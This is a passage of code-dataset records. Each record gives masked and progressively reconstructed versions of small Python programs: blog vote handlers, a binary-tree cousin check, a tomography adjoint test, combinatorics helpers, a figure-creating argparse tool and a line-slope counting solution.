"step-5": "# [BEGIN IMPORTS]\nfrom mainhandler import MainHandler\nfrom sec.data import *\n# [END IMPORTS]\n\n\nclass UpVoteHandler (MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n\n voter_list = post.voter_list\n\n if post.author == user:\n error = \"cant vote for self\"\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = \"cant vote twice\"\n self.render('mainpage.html', error=error)\n else:\n post.upscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n\n\nclass DownVoteHandler (MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n\n voter_list = post.voter_list\n\n if post.author == user:\n error = \"cant vote for self\"\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = \"cant vote twice\"\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
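The two handlers in the record above differ only in which counter they bump. A refactoring sketch, assuming the same MainHandler and PostData API the record already uses:

class VoteHandler(MainHandler):
    field = None  # 'upscore' or 'downscore', set by the subclasses

    def get(self):
        user = self.get_user()
        if not user:
            return self.redirect('/')
        post_id = self.request.get('post_id')
        post = PostData.get_by_id(int(post_id))
        if post.author == user:
            return self.render('mainpage.html', error='cant vote for self')
        if user in post.voter_list:
            return self.render('mainpage.html', error='cant vote twice')
        setattr(post, self.field, getattr(post, self.field) + 1)
        post.voter_list.append(user)
        post.put()
        self.redirect('/blog/' + post_id)

class UpVoteHandler(VoteHandler):
    field = 'upscore'

class DownVoteHandler(VoteHandler):
    field = 'downscore'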
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def isCousin(root, a, b):
if check(root, a, b) == False:
return False
q = []
q.insert(0, root)
tmp = set()
while len(q):
l = len(q)
for i in range(l):
n = q.pop()
tmp.add(n.data)
if n.left:
q.insert(0, n.left)
if n.right:
q.insert(0, n.right)
if a in tmp and b in tmp:
return True
tmp.clear()
return False
<|reserved_special_token_1|>
def check(root, a, b):
if root:
if (root.left == a and root.right == b or root.left == b and root.
right == a):
return False
return check(root.left, a, b) and check(root.right, a, b)
return True
def isCousin(root, a, b):
if check(root, a, b) == False:
return False
q = []
q.insert(0, root)
tmp = set()
while len(q):
l = len(q)
for i in range(l):
n = q.pop()
tmp.add(n.data)
if n.left:
q.insert(0, n.left)
if n.right:
q.insert(0, n.right)
if a in tmp and b in tmp:
return True
tmp.clear()
return False
<|reserved_special_token_1|>
def check(root, a, b):
if root:
if (root.left == a and root.right == b) or (root.left ==b and root.right==a):
return False
return check(root.left, a, b) and check(root.right, a, b)
return True
def isCousin(root, a, b):
# Your code here
if check(root, a, b)==False:
return False
q=[]
q.insert(0, root)
tmp=set()
while(len(q)):
l = len(q)
for i in range(l):
n = q.pop()
tmp.add(n.data)
if n.left:
q.insert(0, n.left)
if n.right:
q.insert(0, n.right)
if a in tmp and b in tmp:
return True
tmp.clear()
return False
|
flexible
|
{
"blob_id": "96cfee85194c9c30b3d74bbddc2a31b6933eb032",
"index": 2226,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef isCousin(root, a, b):\n if check(root, a, b) == False:\n return False\n q = []\n q.insert(0, root)\n tmp = set()\n while len(q):\n l = len(q)\n for i in range(l):\n n = q.pop()\n tmp.add(n.data)\n if n.left:\n q.insert(0, n.left)\n if n.right:\n q.insert(0, n.right)\n if a in tmp and b in tmp:\n return True\n tmp.clear()\n return False\n",
"step-3": "def check(root, a, b):\n if root:\n if (root.left == a and root.right == b or root.left == b and root.\n right == a):\n return False\n return check(root.left, a, b) and check(root.right, a, b)\n return True\n\n\ndef isCousin(root, a, b):\n if check(root, a, b) == False:\n return False\n q = []\n q.insert(0, root)\n tmp = set()\n while len(q):\n l = len(q)\n for i in range(l):\n n = q.pop()\n tmp.add(n.data)\n if n.left:\n q.insert(0, n.left)\n if n.right:\n q.insert(0, n.right)\n if a in tmp and b in tmp:\n return True\n tmp.clear()\n return False\n",
"step-4": "def check(root, a, b):\n if root:\n if (root.left == a and root.right == b) or (root.left ==b and root.right==a):\n return False\n return check(root.left, a, b) and check(root.right, a, b)\n return True\ndef isCousin(root, a, b):\n # Your code here\n if check(root, a, b)==False:\n return False\n q=[]\n q.insert(0, root)\n tmp=set()\n while(len(q)):\n l = len(q)\n for i in range(l):\n n = q.pop()\n tmp.add(n.data)\n if n.left:\n q.insert(0, n.left)\n if n.right:\n q.insert(0, n.right)\n if a in tmp and b in tmp:\n return True\n tmp.clear()\n return False",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
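One inconsistency in the record above: check() compares the child nodes themselves against a and b, while the BFS compares n.data, so the helper only fires if a and b are node objects with data-based equality. A sketch of a data-based sibling test, with a minimal node class for context (both are assumptions, not the grader's driver code):

class Node:
    def __init__(self, data):
        self.data = data
        self.left = None
        self.right = None

def are_siblings(root, a, b):
    # True if the values a and b hang off the same parent
    if root is None:
        return False
    if root.left and root.right and {root.left.data, root.right.data} == {a, b}:
        return True
    return are_siblings(root.left, a, b) or are_siblings(root.right, a, b)

Cousins are then nodes on the same level that are not siblings, which is exactly what the level-order loop plus this check establishes.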
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
u = dxchange.read_tiff('data/init_object.tiff')
u = u + 1.0j * u / 2
nz, n, _ = u.shape
center = n / 2
ntheta = 384
ne = 3 * n // 2
ngpus = 1
pnz = nz // 2
theta = np.linspace(0, 4 * np.pi, ntheta).astype('float32')
with ptychotomo.SolverTomo(theta, ntheta, nz, n, pnz, center, ngpus
) as tslv:
data = tslv.fwd_tomo_batch(u)
with ptychotomo.SolverTomo(theta, ntheta, nz, ne, pnz, center + (ne - n
) / 2, ngpus) as tslv:
data = ptychotomo.utils.paddata(data, ne)
ua = tslv.adj_tomo_batch(data)
ua = ptychotomo.utils.unpadobject(ua, n)
print(f'norm data = {np.linalg.norm(data)}')
print(f'norm object = {np.linalg.norm(ua)}')
print(
f'<u,R*Ru>=<Ru,Ru>: {np.sum(u * np.conj(ua)):e} ? {np.sum(data * np.conj(data)):e}'
)
<|reserved_special_token_1|>
import numpy as np
import dxchange
import ptychotomo
if __name__ == '__main__':
u = dxchange.read_tiff('data/init_object.tiff')
u = u + 1.0j * u / 2
nz, n, _ = u.shape
center = n / 2
ntheta = 384
ne = 3 * n // 2
ngpus = 1
pnz = nz // 2
theta = np.linspace(0, 4 * np.pi, ntheta).astype('float32')
with ptychotomo.SolverTomo(theta, ntheta, nz, n, pnz, center, ngpus
) as tslv:
data = tslv.fwd_tomo_batch(u)
with ptychotomo.SolverTomo(theta, ntheta, nz, ne, pnz, center + (ne - n
) / 2, ngpus) as tslv:
data = ptychotomo.utils.paddata(data, ne)
ua = tslv.adj_tomo_batch(data)
ua = ptychotomo.utils.unpadobject(ua, n)
print(f'norm data = {np.linalg.norm(data)}')
print(f'norm object = {np.linalg.norm(ua)}')
print(
f'<u,R*Ru>=<Ru,Ru>: {np.sum(u * np.conj(ua)):e} ? {np.sum(data * np.conj(data)):e}'
)
<|reserved_special_token_1|>
import numpy as np
import dxchange
import ptychotomo
if __name__ == "__main__":
# read object
u = dxchange.read_tiff('data/init_object.tiff')
u = u+1j*u/2
nz, n, _ = u.shape
# parameters
center = n/2
ntheta = 384
ne = 3*n//2
ngpus = 1
pnz = nz//2
theta = np.linspace(0, 4*np.pi, ntheta).astype('float32')
# simulate data
with ptychotomo.SolverTomo(theta, ntheta, nz, n, pnz, center, ngpus) as tslv:
data = tslv.fwd_tomo_batch(u)
# adjoint test with data padding
with ptychotomo.SolverTomo(theta, ntheta, nz, ne, pnz, center+(ne-n)/2, ngpus) as tslv:
data = ptychotomo.utils.paddata(data, ne)
ua = tslv.adj_tomo_batch(data)
ua = ptychotomo.utils.unpadobject(ua, n)
print(f'norm data = {np.linalg.norm(data)}')
print(f'norm object = {np.linalg.norm(ua)}')
print(
f'<u,R*Ru>=<Ru,Ru>: {np.sum(u*np.conj(ua)):e} ? {np.sum(data*np.conj(data)):e}')
|
flexible
|
{
"blob_id": "4ed6f4db4c9c3319d6289ba402f81bbd8accf915",
"index": 9782,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n u = dxchange.read_tiff('data/init_object.tiff')\n u = u + 1.0j * u / 2\n nz, n, _ = u.shape\n center = n / 2\n ntheta = 384\n ne = 3 * n // 2\n ngpus = 1\n pnz = nz // 2\n theta = np.linspace(0, 4 * np.pi, ntheta).astype('float32')\n with ptychotomo.SolverTomo(theta, ntheta, nz, n, pnz, center, ngpus\n ) as tslv:\n data = tslv.fwd_tomo_batch(u)\n with ptychotomo.SolverTomo(theta, ntheta, nz, ne, pnz, center + (ne - n\n ) / 2, ngpus) as tslv:\n data = ptychotomo.utils.paddata(data, ne)\n ua = tslv.adj_tomo_batch(data)\n ua = ptychotomo.utils.unpadobject(ua, n)\n print(f'norm data = {np.linalg.norm(data)}')\n print(f'norm object = {np.linalg.norm(ua)}')\n print(\n f'<u,R*Ru>=<Ru,Ru>: {np.sum(u * np.conj(ua)):e} ? {np.sum(data * np.conj(data)):e}'\n )\n",
"step-3": "import numpy as np\nimport dxchange\nimport ptychotomo\nif __name__ == '__main__':\n u = dxchange.read_tiff('data/init_object.tiff')\n u = u + 1.0j * u / 2\n nz, n, _ = u.shape\n center = n / 2\n ntheta = 384\n ne = 3 * n // 2\n ngpus = 1\n pnz = nz // 2\n theta = np.linspace(0, 4 * np.pi, ntheta).astype('float32')\n with ptychotomo.SolverTomo(theta, ntheta, nz, n, pnz, center, ngpus\n ) as tslv:\n data = tslv.fwd_tomo_batch(u)\n with ptychotomo.SolverTomo(theta, ntheta, nz, ne, pnz, center + (ne - n\n ) / 2, ngpus) as tslv:\n data = ptychotomo.utils.paddata(data, ne)\n ua = tslv.adj_tomo_batch(data)\n ua = ptychotomo.utils.unpadobject(ua, n)\n print(f'norm data = {np.linalg.norm(data)}')\n print(f'norm object = {np.linalg.norm(ua)}')\n print(\n f'<u,R*Ru>=<Ru,Ru>: {np.sum(u * np.conj(ua)):e} ? {np.sum(data * np.conj(data)):e}'\n )\n",
"step-4": "import numpy as np\nimport dxchange\nimport ptychotomo\n\nif __name__ == \"__main__\":\n \n # read object\n u = dxchange.read_tiff('data/init_object.tiff')\n u = u+1j*u/2\n\n nz, n, _ = u.shape\n\n # parameters\n center = n/2\n ntheta = 384\n ne = 3*n//2\n ngpus = 1\n pnz = nz//2\n theta = np.linspace(0, 4*np.pi, ntheta).astype('float32')\n\n # simulate data\n with ptychotomo.SolverTomo(theta, ntheta, nz, n, pnz, center, ngpus) as tslv:\n data = tslv.fwd_tomo_batch(u)\n\n # adjoint test with data padding\n with ptychotomo.SolverTomo(theta, ntheta, nz, ne, pnz, center+(ne-n)/2, ngpus) as tslv:\n data = ptychotomo.utils.paddata(data, ne)\n ua = tslv.adj_tomo_batch(data)\n ua = ptychotomo.utils.unpadobject(ua, n)\n\n print(f'norm data = {np.linalg.norm(data)}')\n print(f'norm object = {np.linalg.norm(ua)}')\n print(\n f'<u,R*Ru>=<Ru,Ru>: {np.sum(u*np.conj(ua)):e} ? {np.sum(data*np.conj(data)):e}')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
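The final print in the tomography record checks the adjoint identity <u, R*Ru> = <Ru, Ru>, i.e. that adj_tomo_batch really is the adjoint of fwd_tomo_batch. The same test for a plain complex matrix, as a self-contained sketch of what that identity means:

import numpy as np

rng = np.random.default_rng(0)
A = rng.standard_normal((5, 3)) + 1j * rng.standard_normal((5, 3))
u = rng.standard_normal(3) + 1j * rng.standard_normal(3)

Au = A @ u               # forward operator R
AtAu = A.conj().T @ Au   # adjoint R* applied to the data

# <u, R*Ru> equals <Ru, Ru> exactly when R* is the true adjoint of R
assert np.allclose(np.sum(u * np.conj(AtAu)), np.sum(Au * np.conj(Au)))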
from fractions import Fraction
from functools import reduce  # built in on Python 2, must be imported on Python 3
import itertools
# With MOD
MOD = 10**9+7
def ncomb(n, r):
return reduce(lambda a, b: (a*b)%MOD, (Fraction(n-i, i+1) for i in range(r)), 1)
# No MOD
def ncomb(n, r):
return reduce(lambda a, b: (a*b), (Fraction(n-i, i+1) for i in range(r)), 1)
def comb(a, l):
return [subset for subset in itertools.combinations(a, l)]
def comball(a):
r = []
for l in range(0, len(a)+1):
r.extend(comb(a, l))
return r
|
normal
|
{
"blob_id": "2bc0d76e17f2f52fce9cc1925a3a0e0f53f5b81d",
"index": 7953,
"step-1": "<mask token>\n\n\ndef ncomb(n, r):\n return reduce(lambda a, b: a * b % MOD, (Fraction(n - i, i + 1) for i in\n range(r)), 1)\n\n\n<mask token>\n\n\ndef comball(a):\n r = []\n for l in range(0, len(a) + 1):\n r.extend(comb(a, l))\n return r\n",
"step-2": "<mask token>\n\n\ndef ncomb(n, r):\n return reduce(lambda a, b: a * b % MOD, (Fraction(n - i, i + 1) for i in\n range(r)), 1)\n\n\n<mask token>\n\n\ndef comb(a, l):\n return [subset for subset in itertools.combinations(a, l)]\n\n\ndef comball(a):\n r = []\n for l in range(0, len(a) + 1):\n r.extend(comb(a, l))\n return r\n",
"step-3": "<mask token>\n\n\ndef ncomb(n, r):\n return reduce(lambda a, b: a * b % MOD, (Fraction(n - i, i + 1) for i in\n range(r)), 1)\n\n\ndef ncomb(n, r):\n return reduce(lambda a, b: a * b, (Fraction(n - i, i + 1) for i in\n range(r)), 1)\n\n\ndef comb(a, l):\n return [subset for subset in itertools.combinations(a, l)]\n\n\ndef comball(a):\n r = []\n for l in range(0, len(a) + 1):\n r.extend(comb(a, l))\n return r\n",
"step-4": "<mask token>\nMOD = 10 ** 9 + 7\n\n\ndef ncomb(n, r):\n return reduce(lambda a, b: a * b % MOD, (Fraction(n - i, i + 1) for i in\n range(r)), 1)\n\n\ndef ncomb(n, r):\n return reduce(lambda a, b: a * b, (Fraction(n - i, i + 1) for i in\n range(r)), 1)\n\n\ndef comb(a, l):\n return [subset for subset in itertools.combinations(a, l)]\n\n\ndef comball(a):\n r = []\n for l in range(0, len(a) + 1):\n r.extend(comb(a, l))\n return r\n",
"step-5": "from fractions import Fraction\nimport itertools\n\n# With MOD\nMOD = 10**9+7\ndef ncomb(n, r):\n return reduce(lambda a, b: (a*b)%MOD, (Fraction(n-i, i+1) for i in range(r)), 1)\n\n# No MOD\ndef ncomb(n, r):\n return reduce(lambda a, b: (a*b), (Fraction(n-i, i+1) for i in range(r)), 1)\n\ndef comb(a, l):\n return [subset for subset in itertools.combinations(a, l)]\n\ndef comball(a):\n r = []\n for l in range(0, len(a)+1):\n r.extend(comb(a, l))\n return r\n",
"step-ids": [
2,
3,
4,
5,
7
]
}
|
[
2,
3,
4,
5,
7
] |
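A caveat on the MOD variant above: with Fraction factors, (a*b) % MOD is exact rational arithmetic, not modular arithmetic, so it does not actually compute nCr mod p. The usual integer versions, as a sketch (math.comb needs Python 3.8+; the inverse via pow assumes MOD is prime, which 10**9+7 is):

import math

MOD = 10**9 + 7

def ncomb_mod(n, r):
    # exact value first, reduced once at the end; fine for small n
    return math.comb(n, r) % MOD

def ncomb_mod_big(n, r):
    # multiplicative formula with a modular inverse (requires MOD prime)
    num = den = 1
    for i in range(r):
        num = num * (n - i) % MOD
        den = den * (i + 1) % MOD
    return num * pow(den, MOD - 2, MOD) % MOD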
<|reserved_special_token_0|>
class FCreator(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def editParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', type=float)
parser.add_argument('-r', '--radius', type=float)
return parser.parse_args(line.split())
def create(self, line: str) ->Figure:
params = self.createParser(line)
if params.type == 'square':
return self.createSquare(params.name, params.width)
if params.type == 'circle':
return self.createCircle(params.name, params.radius)
<|reserved_special_token_0|>
def createSquare(self, name: str, width: float):
square = Square(name)
square.width(width)
return square
def createCircle(self, name: str, radius: float):
circle = Circle(name)
circle.radius(radius)
return circle
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FCreator(object):
<|reserved_special_token_0|>
def createParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--type', required=True, choices=self.__types
)
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', default=20, type=float)
parser.add_argument('-r', '--radius', default=20, type=float)
return parser.parse_args(line.split())
def editParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', type=float)
parser.add_argument('-r', '--radius', type=float)
return parser.parse_args(line.split())
def create(self, line: str) ->Figure:
params = self.createParser(line)
if params.type == 'square':
return self.createSquare(params.name, params.width)
if params.type == 'circle':
return self.createCircle(params.name, params.radius)
def edit(self, params, figure: Figure):
if figure.type == 'square':
return self.createSquare(params.name, params.width)
if figure.type == 'circle':
return self.createCircle(params.name, params.radius)
def createSquare(self, name: str, width: float):
square = Square(name)
square.width(width)
return square
def createCircle(self, name: str, radius: float):
circle = Circle(name)
circle.radius(radius)
return circle
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FCreator(object):
<|reserved_special_token_0|>
def createParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--type', required=True, choices=self.__types
)
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', default=20, type=float)
parser.add_argument('-r', '--radius', default=20, type=float)
return parser.parse_args(line.split())
def editParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', type=float)
parser.add_argument('-r', '--radius', type=float)
return parser.parse_args(line.split())
def create(self, line: str) ->Figure:
params = self.createParser(line)
if params.type == 'square':
return self.createSquare(params.name, params.width)
if params.type == 'circle':
return self.createCircle(params.name, params.radius)
def edit(self, params, figure: Figure):
if figure.type == 'square':
return self.createSquare(params.name, params.width)
if figure.type == 'circle':
return self.createCircle(params.name, params.radius)
def createSquare(self, name: str, width: float):
square = Square(name)
square.width(width)
return square
def createCircle(self, name: str, radius: float):
circle = Circle(name)
circle.radius(radius)
return circle
def getTypes(self) ->str:
return ''.join('{}\n'.format(t) for t in self.__types)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FCreator(object):
__types = ['square', 'circle']
def createParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--type', required=True, choices=self.__types
)
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', default=20, type=float)
parser.add_argument('-r', '--radius', default=20, type=float)
return parser.parse_args(line.split())
def editParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', type=float)
parser.add_argument('-r', '--radius', type=float)
return parser.parse_args(line.split())
def create(self, line: str) ->Figure:
params = self.createParser(line)
if params.type == 'square':
return self.createSquare(params.name, params.width)
if params.type == 'circle':
return self.createCircle(params.name, params.radius)
def edit(self, params, figure: Figure):
if figure.type == 'square':
return self.createSquare(params.name, params.width)
if figure.type == 'circle':
return self.createCircle(params.name, params.radius)
def createSquare(self, name: str, width: float):
square = Square(name)
square.width(width)
return square
def createCircle(self, name: str, radius: float):
circle = Circle(name)
circle.radius(radius)
return circle
def getTypes(self) ->str:
return ''.join('{}\n'.format(t) for t in self.__types)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import argparse
from figure import Figure
from figure.Circle import Circle
from figure.Square import Square
class FCreator(object):
__types = ['square', 'circle']
def createParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--type', required=True, choices=self.__types)
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', default=20, type=float)
parser.add_argument('-r', '--radius', default=20, type=float)
return parser.parse_args(line.split())
def editParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', type=float)
parser.add_argument('-r', '--radius', type=float)
return parser.parse_args(line.split())
def create(self, line: str) -> Figure:
params = self.createParser(line)
if params.type == 'square':
return self.createSquare(params.name, params.width)
if params.type == 'circle':
return self.createCircle(params.name, params.radius)
def edit(self, params, figure: Figure):
if figure.type == 'square':
return self.createSquare(params.name, params.width)
if figure.type == 'circle':
return self.createCircle(params.name, params.radius)
def createSquare(self, name: str, width: float):
square = Square(name)
square.width(width)
return square
def createCircle(self, name: str, radius: float):
circle = Circle(name)
circle.radius(radius)
return circle
def getTypes(self) -> str:
return "".join("{}\n".format(t) for t in self.__types)
fcreator = FCreator()
|
flexible
|
{
"blob_id": "086ee4de1d74654ef85bd0a169fdf49c8f52bef2",
"index": 3792,
"step-1": "<mask token>\n\n\nclass FCreator(object):\n <mask token>\n <mask token>\n\n def editParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', type=float)\n parser.add_argument('-r', '--radius', type=float)\n return parser.parse_args(line.split())\n\n def create(self, line: str) ->Figure:\n params = self.createParser(line)\n if params.type == 'square':\n return self.createSquare(params.name, params.width)\n if params.type == 'circle':\n return self.createCircle(params.name, params.radius)\n <mask token>\n\n def createSquare(self, name: str, width: float):\n square = Square(name)\n square.width(width)\n return square\n\n def createCircle(self, name: str, radius: float):\n circle = Circle(name)\n circle.radius(radius)\n return circle\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FCreator(object):\n <mask token>\n\n def createParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--type', required=True, choices=self.__types\n )\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', default=20, type=float)\n parser.add_argument('-r', '--radius', default=20, type=float)\n return parser.parse_args(line.split())\n\n def editParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', type=float)\n parser.add_argument('-r', '--radius', type=float)\n return parser.parse_args(line.split())\n\n def create(self, line: str) ->Figure:\n params = self.createParser(line)\n if params.type == 'square':\n return self.createSquare(params.name, params.width)\n if params.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def edit(self, params, figure: Figure):\n if figure.type == 'square':\n return self.createSquare(params.name, params.width)\n if figure.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def createSquare(self, name: str, width: float):\n square = Square(name)\n square.width(width)\n return square\n\n def createCircle(self, name: str, radius: float):\n circle = Circle(name)\n circle.radius(radius)\n return circle\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FCreator(object):\n <mask token>\n\n def createParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--type', required=True, choices=self.__types\n )\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', default=20, type=float)\n parser.add_argument('-r', '--radius', default=20, type=float)\n return parser.parse_args(line.split())\n\n def editParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', type=float)\n parser.add_argument('-r', '--radius', type=float)\n return parser.parse_args(line.split())\n\n def create(self, line: str) ->Figure:\n params = self.createParser(line)\n if params.type == 'square':\n return self.createSquare(params.name, params.width)\n if params.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def edit(self, params, figure: Figure):\n if figure.type == 'square':\n return self.createSquare(params.name, params.width)\n if figure.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def createSquare(self, name: str, width: float):\n square = Square(name)\n square.width(width)\n return square\n\n def createCircle(self, name: str, radius: float):\n circle = Circle(name)\n circle.radius(radius)\n return circle\n\n def getTypes(self) ->str:\n return ''.join('{}\\n'.format(t) for t in self.__types)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass FCreator(object):\n __types = ['square', 'circle']\n\n def createParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--type', required=True, choices=self.__types\n )\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', default=20, type=float)\n parser.add_argument('-r', '--radius', default=20, type=float)\n return parser.parse_args(line.split())\n\n def editParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', type=float)\n parser.add_argument('-r', '--radius', type=float)\n return parser.parse_args(line.split())\n\n def create(self, line: str) ->Figure:\n params = self.createParser(line)\n if params.type == 'square':\n return self.createSquare(params.name, params.width)\n if params.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def edit(self, params, figure: Figure):\n if figure.type == 'square':\n return self.createSquare(params.name, params.width)\n if figure.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def createSquare(self, name: str, width: float):\n square = Square(name)\n square.width(width)\n return square\n\n def createCircle(self, name: str, radius: float):\n circle = Circle(name)\n circle.radius(radius)\n return circle\n\n def getTypes(self) ->str:\n return ''.join('{}\\n'.format(t) for t in self.__types)\n\n\n<mask token>\n",
"step-5": "import argparse\n\nfrom figure import Figure\nfrom figure.Circle import Circle\nfrom figure.Square import Square\n\n\nclass FCreator(object):\n __types = ['square', 'circle']\n\n def createParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--type', required=True, choices=self.__types)\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', default=20, type=float)\n parser.add_argument('-r', '--radius', default=20, type=float)\n\n return parser.parse_args(line.split())\n\n def editParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', type=float)\n parser.add_argument('-r', '--radius', type=float)\n\n return parser.parse_args(line.split())\n\n\n\n def create(self, line: str) -> Figure:\n\n params = self.createParser(line)\n\n if params.type == 'square':\n return self.createSquare(params.name, params.width)\n\n if params.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n\n def edit(self, params, figure: Figure):\n\n if figure.type == 'square':\n return self.createSquare(params.name, params.width)\n\n if figure.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def createSquare(self, name: str, width: float):\n square = Square(name)\n square.width(width)\n return square\n\n def createCircle(self, name: str, radius: float):\n circle = Circle(name)\n circle.radius(radius)\n return circle\n\n def getTypes(self) -> str:\n return \"\".join(\"{}\\n\".format(t) for t in self.__types)\n\n\nfcreator = FCreator()\n",
"step-ids": [
5,
7,
8,
9,
12
]
}
|
[
5,
7,
8,
9,
12
] |
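For context, the parser flags defined in the FCreator record imply usage along these lines (a sketch; the importing module's name is an assumption, and Square/Circle come from the record's own figure package):

from fcreator import fcreator  # module name assumed

square = fcreator.create('-t square -n s1 -w 12.5')
circle = fcreator.create('-t circle -n c1 -r 4')
print(fcreator.getTypes())     # lists the supported types, one per line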
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for tc in range(1, T + 1):
N = int(input())
dot = [list(map(int, input().split())) for _ in range(N)]
ran = []
for a in range(N - 1):
for b in range(a + 1, N):
if dot[a][1] - dot[b][1] == 0:
if 'inf' not in ran:
ran.append('inf')
else:
K = (dot[a][0] - dot[b][0]) / (dot[a][1] - dot[b][1])
if K not in ran:
ran.append(K)
print('#{} {}'.format(tc, len(ran)))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.stdin = open('줄긋기.txt')
T = int(input())
for tc in range(1, T + 1):
N = int(input())
dot = [list(map(int, input().split())) for _ in range(N)]
ran = []
for a in range(N - 1):
for b in range(a + 1, N):
if dot[a][1] - dot[b][1] == 0:
if 'inf' not in ran:
ran.append('inf')
else:
K = (dot[a][0] - dot[b][0]) / (dot[a][1] - dot[b][1])
if K not in ran:
ran.append(K)
print('#{} {}'.format(tc, len(ran)))
<|reserved_special_token_1|>
import sys
sys.stdin = open('줄긋기.txt')
T = int(input())
for tc in range(1, T + 1):
N = int(input())
dot = [list(map(int, input().split())) for _ in range(N)]
ran = []
for a in range(N - 1):
for b in range(a + 1, N):
if dot[a][1] - dot[b][1] == 0:
if 'inf' not in ran:
ran.append('inf')
else:
K = (dot[a][0] - dot[b][0]) / (dot[a][1] - dot[b][1])
if K not in ran:
ran.append(K)
print('#{} {}'.format(tc, len(ran)))
|
flexible
|
{
"blob_id": "03854f48751460fdc27d42ee5c766934ee356cfd",
"index": 6161,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor tc in range(1, T + 1):\n N = int(input())\n dot = [list(map(int, input().split())) for _ in range(N)]\n ran = []\n for a in range(N - 1):\n for b in range(a + 1, N):\n if dot[a][1] - dot[b][1] == 0:\n if 'inf' not in ran:\n ran.append('inf')\n else:\n K = (dot[a][0] - dot[b][0]) / (dot[a][1] - dot[b][1])\n if K not in ran:\n ran.append(K)\n print('#{} {}'.format(tc, len(ran)))\n",
"step-3": "<mask token>\nsys.stdin = open('줄긋기.txt')\nT = int(input())\nfor tc in range(1, T + 1):\n N = int(input())\n dot = [list(map(int, input().split())) for _ in range(N)]\n ran = []\n for a in range(N - 1):\n for b in range(a + 1, N):\n if dot[a][1] - dot[b][1] == 0:\n if 'inf' not in ran:\n ran.append('inf')\n else:\n K = (dot[a][0] - dot[b][0]) / (dot[a][1] - dot[b][1])\n if K not in ran:\n ran.append(K)\n print('#{} {}'.format(tc, len(ran)))\n",
